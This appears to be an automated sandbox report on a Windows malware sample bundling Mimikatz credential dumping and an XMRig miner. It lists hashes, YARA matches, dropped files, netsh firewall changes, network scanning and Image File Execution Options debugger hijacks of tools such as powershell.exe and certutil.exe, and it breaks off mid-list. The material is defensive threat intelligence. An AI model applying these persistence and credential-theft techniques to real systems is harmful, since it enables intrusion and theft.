Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29-10-2024 16:44
Behavioral task
behavioral1
Sample
2024-10-29_4e3e045397c8f2890346d8443eb37f4b_hacktools_icedid_mimikatz.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
2024-10-29_4e3e045397c8f2890346d8443eb37f4b_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-10-29_4e3e045397c8f2890346d8443eb37f4b_hacktools_icedid_mimikatz.exe
-
Size
13.6MB
-
MD5
4e3e045397c8f2890346d8443eb37f4b
-
SHA1
6b92769be00f74948db54babbad82b2a189b70af
-
SHA256
08772c64cea8fe542c0c5544cf320873ba91e1a0d1f844faaad3cc521f3e19c2
-
SHA512
7b3d03c69de16108147408d0c734d2bb5c8d41652974f203d86a3117ee1c9b8fad26357275bd9ace0a0cacfaa9dfedf2e4a3e23b70d36f9f990160beac2001fd
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
tsgwibn.exedescription pid Process procid_target PID 3868 created 2116 3868 tsgwibn.exe 38 -
Xmrig family
-
Contacts a large (27400) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
Processes:
resource yara_rule behavioral2/memory/1564-178-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp xmrig behavioral2/memory/1564-182-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp xmrig behavioral2/memory/1564-199-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp xmrig behavioral2/memory/1564-209-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp xmrig behavioral2/memory/1564-218-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp xmrig behavioral2/memory/1564-233-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp xmrig behavioral2/memory/1564-250-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp xmrig behavioral2/memory/1564-258-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp xmrig behavioral2/memory/1564-267-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp xmrig behavioral2/memory/1564-376-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp xmrig behavioral2/memory/1564-377-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp xmrig behavioral2/memory/1564-381-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
Processes:
resource yara_rule behavioral2/memory/1484-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/1484-4-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/files/0x000b000000023b5c-6.dat mimikatz behavioral2/memory/2328-8-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/4088-138-0x00007FF6125A0000-0x00007FF61268E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
wpcap.exetsgwibn.exedescription ioc Process File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts tsgwibn.exe File opened for modification C:\Windows\system32\drivers\etc\hosts tsgwibn.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
Processes:
tsgwibn.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" tsgwibn.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 1084 netsh.exe 3320 netsh.exe -
Executes dropped EXE 29 IoCs
Processes:
tsgwibn.exetsgwibn.exewpcap.exeuzurgcimy.exevfshost.execumgbbwyg.exexohudmc.exejobnkm.exewerigg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.exetsgwibn.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.exewvwuinghb.exetsgwibn.exepid Process 2328 tsgwibn.exe 3868 tsgwibn.exe 4080 wpcap.exe 1720 uzurgcimy.exe 4088 vfshost.exe 4224 cumgbbwyg.exe 4544 xohudmc.exe 1072 jobnkm.exe 1564 werigg.exe 4928 cumgbbwyg.exe 3024 cumgbbwyg.exe 1216 cumgbbwyg.exe 2808 cumgbbwyg.exe 2936 cumgbbwyg.exe 2028 cumgbbwyg.exe 984 cumgbbwyg.exe 4332 cumgbbwyg.exe 2256 cumgbbwyg.exe 4352 cumgbbwyg.exe 2340 cumgbbwyg.exe 1084 cumgbbwyg.exe 2668 cumgbbwyg.exe 3992 tsgwibn.exe 3328 cumgbbwyg.exe 4548 cumgbbwyg.exe 3056 cumgbbwyg.exe 3532 cumgbbwyg.exe 3076 wvwuinghb.exe 5472 tsgwibn.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exeuzurgcimy.exepid Process 4080 wpcap.exe 4080 wpcap.exe 4080 wpcap.exe 4080 wpcap.exe 4080 wpcap.exe 4080 wpcap.exe 4080 wpcap.exe 4080 wpcap.exe 4080 wpcap.exe 1720 uzurgcimy.exe 1720 uzurgcimy.exe 1720 uzurgcimy.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 83 ifconfig.me 84 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
tsgwibn.exewpcap.exexohudmc.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE tsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 tsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content tsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 tsgwibn.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\jobnkm.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 tsgwibn.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF tsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft tsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF tsgwibn.exe File opened for modification C:\Windows\SysWOW64\jobnkm.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies tsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache tsgwibn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData tsgwibn.exe -
Processes:
resource yara_rule behavioral2/files/0x0007000000023cc5-136.dat upx behavioral2/memory/4088-135-0x00007FF6125A0000-0x00007FF61268E000-memory.dmp upx behavioral2/memory/4088-138-0x00007FF6125A0000-0x00007FF61268E000-memory.dmp upx behavioral2/files/0x0007000000023ccf-141.dat upx behavioral2/memory/4224-142-0x00007FF695580000-0x00007FF6955DB000-memory.dmp upx behavioral2/memory/4224-146-0x00007FF695580000-0x00007FF6955DB000-memory.dmp upx behavioral2/files/0x0007000000023cce-163.dat upx behavioral2/memory/1564-164-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp upx behavioral2/memory/4928-171-0x00007FF695580000-0x00007FF6955DB000-memory.dmp upx behavioral2/memory/3024-175-0x00007FF695580000-0x00007FF6955DB000-memory.dmp upx behavioral2/memory/1564-178-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp upx behavioral2/memory/1216-180-0x00007FF695580000-0x00007FF6955DB000-memory.dmp upx behavioral2/memory/1564-182-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp upx behavioral2/memory/2808-185-0x00007FF695580000-0x00007FF6955DB000-memory.dmp upx behavioral2/memory/2936-189-0x00007FF695580000-0x00007FF6955DB000-memory.dmp upx behavioral2/memory/2028-193-0x00007FF695580000-0x00007FF6955DB000-memory.dmp upx behavioral2/memory/984-197-0x00007FF695580000-0x00007FF6955DB000-memory.dmp upx behavioral2/memory/1564-199-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp upx behavioral2/memory/4332-202-0x00007FF695580000-0x00007FF6955DB000-memory.dmp upx behavioral2/memory/2256-206-0x00007FF695580000-0x00007FF6955DB000-memory.dmp upx behavioral2/memory/1564-209-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp upx behavioral2/memory/4352-212-0x00007FF695580000-0x00007FF6955DB000-memory.dmp upx behavioral2/memory/2340-216-0x00007FF695580000-0x00007FF6955DB000-memory.dmp upx behavioral2/memory/1564-218-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp upx behavioral2/memory/1084-221-0x00007FF695580000-0x00007FF6955DB000-memory.dmp upx behavioral2/memory/2668-225-0x00007FF695580000-0x00007FF6955DB000-memory.dmp upx behavioral2/memory/3328-232-0x00007FF695580000-0x00007FF6955DB000-memory.dmp upx behavioral2/memory/1564-233-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp upx behavioral2/memory/4548-235-0x00007FF695580000-0x00007FF6955DB000-memory.dmp upx behavioral2/memory/3056-237-0x00007FF695580000-0x00007FF6955DB000-memory.dmp upx behavioral2/memory/3532-239-0x00007FF695580000-0x00007FF6955DB000-memory.dmp upx behavioral2/memory/1564-250-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp upx behavioral2/memory/1564-258-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp upx behavioral2/memory/1564-267-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp upx behavioral2/memory/1564-376-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp upx behavioral2/memory/1564-377-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp upx behavioral2/memory/1564-381-0x00007FF7DFA10000-0x00007FF7DFB30000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
tsgwibn.exewvwuinghb.exe2024-10-29_4e3e045397c8f2890346d8443eb37f4b_hacktools_icedid_mimikatz.execmd.exedescription ioc Process File created C:\Windows\vguwtuflb\UnattendGC\svschost.xml tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\svschost.xml tsgwibn.exe File created C:\Windows\guiyywyg\vimpcsvc.xml tsgwibn.exe File opened for modification C:\Windows\guiyywyg\schoedcl.xml tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\docmicfg.xml tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\spoolsrv.xml tsgwibn.exe File opened for modification C:\Windows\guiyywyg\svschost.xml tsgwibn.exe File created C:\Windows\vguwtuflb\Corporate\vfshost.exe tsgwibn.exe File created C:\Windows\vguwtuflb\upbdrjv\swrpwe.exe tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\schoedcl.xml tsgwibn.exe File opened for modification C:\Windows\guiyywyg\docmicfg.xml tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\crli-0.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\docmicfg.exe tsgwibn.exe File created C:\Windows\guiyywyg\svschost.xml tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\AppCapture32.dll tsgwibn.exe File opened for modification C:\Windows\guiyywyg\vimpcsvc.xml tsgwibn.exe File created C:\Windows\vguwtuflb\imnwwtqyn\ip.txt tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\exma-1.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\trch-1.dll tsgwibn.exe File created C:\Windows\vguwtuflb\Corporate\mimidrv.sys tsgwibn.exe File created C:\Windows\vguwtuflb\imnwwtqyn\scan.bat tsgwibn.exe File opened for modification C:\Windows\vguwtuflb\imnwwtqyn\Result.txt wvwuinghb.exe File created C:\Windows\vguwtuflb\imnwwtqyn\wpcap.exe tsgwibn.exe File created C:\Windows\vguwtuflb\imnwwtqyn\wpcap.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\vimpcsvc.exe tsgwibn.exe File opened for modification C:\Windows\guiyywyg\spoolsrv.xml tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\AppCapture64.dll tsgwibn.exe File created C:\Windows\vguwtuflb\Corporate\mimilib.dll tsgwibn.exe File opened for modification C:\Windows\vguwtuflb\imnwwtqyn\Packet.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\cnli-1.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\trfo-2.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\zlib1.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\vimpcsvc.xml tsgwibn.exe File created C:\Windows\vguwtuflb\imnwwtqyn\uzurgcimy.exe tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\coli-0.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\tibe-2.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\spoolsrv.xml tsgwibn.exe File created C:\Windows\guiyywyg\docmicfg.xml tsgwibn.exe File opened for modification C:\Windows\guiyywyg\tsgwibn.exe 2024-10-29_4e3e045397c8f2890346d8443eb37f4b_hacktools_icedid_mimikatz.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\ucl.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\spoolsrv.exe tsgwibn.exe File created C:\Windows\vguwtuflb\imnwwtqyn\Packet.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\schoedcl.exe tsgwibn.exe File opened for modification C:\Windows\vguwtuflb\Corporate\log.txt cmd.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\libeay32.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\libxml2.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\posh-0.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\tucl-1.dll tsgwibn.exe File created C:\Windows\guiyywyg\spoolsrv.xml tsgwibn.exe File created C:\Windows\guiyywyg\schoedcl.xml tsgwibn.exe File created C:\Windows\ime\tsgwibn.exe tsgwibn.exe File created C:\Windows\vguwtuflb\imnwwtqyn\wvwuinghb.exe tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\xdvl-0.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\svschost.exe tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\Shellcode.ini tsgwibn.exe File created C:\Windows\guiyywyg\tsgwibn.exe 2024-10-29_4e3e045397c8f2890346d8443eb37f4b_hacktools_icedid_mimikatz.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\vimpcsvc.xml tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\docmicfg.xml tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\ssleay32.dll tsgwibn.exe File created C:\Windows\vguwtuflb\UnattendGC\specials\schoedcl.xml tsgwibn.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid Process 2892 sc.exe 3416 sc.exe 4776 sc.exe 1520 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
